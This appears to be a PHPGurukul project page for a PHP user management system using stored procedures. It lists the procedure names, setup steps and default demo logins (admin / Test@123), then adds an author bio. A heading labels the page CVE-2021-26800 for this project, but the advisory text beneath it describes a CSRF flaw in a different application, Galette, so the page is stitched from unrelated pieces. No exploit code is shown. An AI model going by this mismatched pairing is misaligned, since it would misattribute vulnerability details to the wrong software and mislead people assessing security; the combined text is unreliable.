Once the stored procedure has been “stored”, client applications can execute the stored procedure over and over again without sending it to the database server again and without compiling it again.  
Stored procedures improve performance by reducing network traffic and CPU  load.  
**_Comparison with dynamic SQL_**

*   Remove overhead
*   Avoidance of network  traffic
*   Encapsulation of business  logic
*   Delegation of access-rights
*   Some protection from SQL injection attacks

**This project have two modules**

*   User Module
*   Admin Module

**User Modules**

*   User can signup
*   User can log in to the system.
*   User Password Recovery
*   After login user can edit his/her own profile.
*   Change password.

**Admin Modules**

*   Admin can log in to the system.
*   Admin Password Recovery.
*   After login admin can view the admin dashboard.
*   Manage all the user(Update and delete the user profile).
*   Change Password.

**Stored Procedure used in this Project**

**User module**

*   sp\_signup (used for user signup)
*   sp\_checkemailavailabilty (check the email available for registration or not)
*   sp\_userlogin (used for user login)
*   sp\_userpwdrecoveryvalidation (used for password recovery user validation)
*   sp\_userpwdrecoveryvalidation (if user details verified by the above-stored procedure then it will reset the user password)
*   sp\_userprofile (used to view user profile)
*   sp\_userupdateprofile (used to update the user profile details) **Note:** This procedure used in both module
*   sp\_useremailupdation (used to update user email id) **Note:** This procedure used in both module
*   sp\_usercurrentpwdvalidate (used to valid user current password  for change password)
*   sp\_userchangepwd (if the password is validated by the above-stored procedure then this stored procedure  used to change the user password)

**Admin module**

*   sp\_adminlogin (used for admin login)
*   sp\_adminpwdrecoveryvalidation (used for password recovery admin validation)
*   sp\_adminpasswordrecovery (if admin details verfied by above stored procedure then it will reset the admin password)
*   sp\_adminprofile (used to view admin profile details)
*   sp\_admindashboard (used for admin dashboard)
*   sp\_recent15users (used to view the 15 recent registered user at dashboard)
*   sp\_allregisteredusers (used to view all registered users)
*   sp\_userdeletion (used to delete user profile)
*   sp\_userupdateprofile (used to updat the user profile details)   **Note:** This procdure used in both module
*   sp\_useremailupdation (used to update user email id)   **Note:** This procdure used in both module
*   sp\_admincurrentpwdvalidate (used to valid admincurrent password  for change password)
*   sp\_adminchangepwd (if the password is validate by above stored procedure then this store used to change the admin password)

**How to run the User Management System in PHP Stored Procedure**

1.Download the zip file

2.Extract the file and copy ums-sp folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5.Create a database with name umspsdb

6.Import regdb.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/ums-sp

**User Credential**  
**Username:** anujk@gmail.com  
**Password:** Test@123  
or Register a new user

**Admin Credential**  
**Username:** admin  
**Password:** Test@123

**View Demo———————————————————————–**

UMS in PHP using Stored Procedure

Size: 7.44 MB

Version: V1.0

![](https://secure.gravatar.com/avatar/7b336ec82044887afe61d64e1c96b5cf?s=128&d=mm&r=g)

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, and MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 80+ PHP Projects for you.

CVE-2021-26800: User Management System in PHP using Stored Procedure |User Management System using Stored Procedure - PHPGurukul

Galette is a membership management web application built for non profit organizations and released under GPLv3. Versions prior to 0.9.6 do not check for Cross Site Request Forgery attacks. All users are advised to upgrade to 0.9.6 as soon as possible. There are no known workarounds for this issue.

**Impact**

There is no CSRF checks in Galette. This affects all versions prior to 0.9.6.

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing.

**Patches**

Upgrade to 0.9.6. No workaround is available.

Tag

#csrf